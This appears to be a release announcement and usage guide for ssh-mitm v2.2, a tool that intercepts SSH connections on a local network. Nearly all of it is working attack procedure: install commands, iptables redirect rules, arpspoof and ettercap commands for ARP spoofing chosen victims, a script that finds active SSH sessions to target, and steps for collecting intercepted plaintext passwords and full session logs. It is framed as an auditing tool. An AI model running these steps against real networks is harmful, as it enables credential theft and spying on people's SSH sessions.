ssh-mitm v2.2 releases: SSH man-in-the-middle tool

SSH MITM

This penetration testing tool allows an auditor to intercept SSH connections. A patch applied to the OpenSSH v7.5p1 source code causes it to act as a proxy between the victim and a legitimate SSH server; all plaintext passwords and sessions are logged to disk.

Of course, the victim’s SSH client will complain that the server’s key has changed. Because 99.99999% of the time this is caused by a legitimate action (OS re-install, configuration change, etc), many/most users will disregard the warning and continue on.

NOTE: Only run the modified sshd_mitm in a VM or container! Ad-hoc edits were made to the OpenSSH sources in critical regions, with no regard to their security implications. It’s not hard to imagine these edits introduce serious vulnerabilities.

Changelog v2.2

• Fixed installation for Kali and Linux Mint 19.
• Fixed a double-password prompt that occurred under certain conditions.
• Improved error logging.

Install

git clone https://github.com/jtesta/ssh-mitm.git
cd ssh-mitm
bash install.sh

Usage

1.) Run sshd:



cd /path/to/openssh-7.5p1-mitm

sudo $PWD/sshd -f $PWD/sshd_config



2.) Enable IP forwarding:



sudo bash -c "echo 1 > /proc/sys/net/ipv4/ip_forward"

sudo iptables -P FORWARD ACCEPT



3.) Allow connections to sshd and re-route forwarded SSH connections:



sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT

sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 22



4.) ARP spoof a target(s) (Protip: do NOT spoof all the things! Your puny network interface won't like be able to handle an entire network's traffic all at once. Only spoof a couple IPs at a time):



arpspoof -r -t 192.168.x.1 192.168.x.5



5.) Monitor auth.log. Intercepted passwords will appear here:



sudo tail -f /var/log/auth.log



6.) Once a session is established, a full log of all input & output can be found in /home/bogus/session_*.txt.

Finding Targets

The JoesAwesomeSSHMITMVictimFinder.py script makes finding targets on a LAN very easy. It will ARP spoof a block of IPs and sniff for SSH traffic for a short period of time before moving on to the next block. Any ongoing SSH connections originating from devices on the LAN are reported.

By default, JoesAwesomeSSHMITMVictimFinder.py will ARP spoof and sniff only 5 IPs at a time for 20 seconds before moving onto the next block of 5. These parameters can be tuned, though a trade-off exists: the more IPs that are spoofed at a time, the greater the chance you will catch an ongoing SSH connection, but also the greater the strain you will put on your puny network interface. Under too high of a load, your interface will start dropping frames, causing a denial-of-service and greatly raising suspicions (this is bad). The defaults shouldn’t cause problems in most cases, though it’ll take longer to find targets. The block size can be safely raised on low-utilization networks.

# ./JoesAwesomeSSHMITMVictimFinder.py --interface enp0s3 --ignore-ips 10.11.12.50,10.11.12.53

Found local address 10.11.12.141 and adding to ignore list.

Using network CIDR 10.11.12.141/24.

Found default gateway: 10.11.12.1

IP blocks of size 5 will be spoofed for 20 seconds each.

The following IPs will be skipped: 10.11.12.50 10.11.12.53 10.11.12.141





Local clients:

  * 10.11.12.70 -> 174.129.77.155:22

  * 10.11.12.43 -> 10.11.99.2:22

Running The Attack

1.) Once you’ve completed the initial setup and found a list of potential victims (see above), execute start.sh as root. This will start sshd_mitm, enable IP forwarding, and set up SSH packet interception through iptables.

2.) ARP spoof the target(s) (Protip: do NOT spoof all the things! Your puny network interface won’t likely be able to handle an entire network’s traffic all at once. Only spoof a couple IPs at a time):

arpspoof -r -t 192.168.x.1 192.168.x.5

Alternatively, you can use the ettercap tool:

ettercap -i enp0s3 -T -M arp /192.168.x.1// /192.168.x.5,192.168.x.6//

3.) Monitor auth.log. Intercepted passwords will appear here:

sudo tail -f /var/log/auth.log

4.) Once a session is established, a full log of all input & output can be found in /home/ssh-mitm/. SSH sessions are logged as shell_session_*.txt, and SFTP sessions are logged as sftp_session_*.html (with transferred files stored in a corresponding directory).

Copyright 2017-2018 Joseph S. Testa II

Source: https://github.com/jtesta/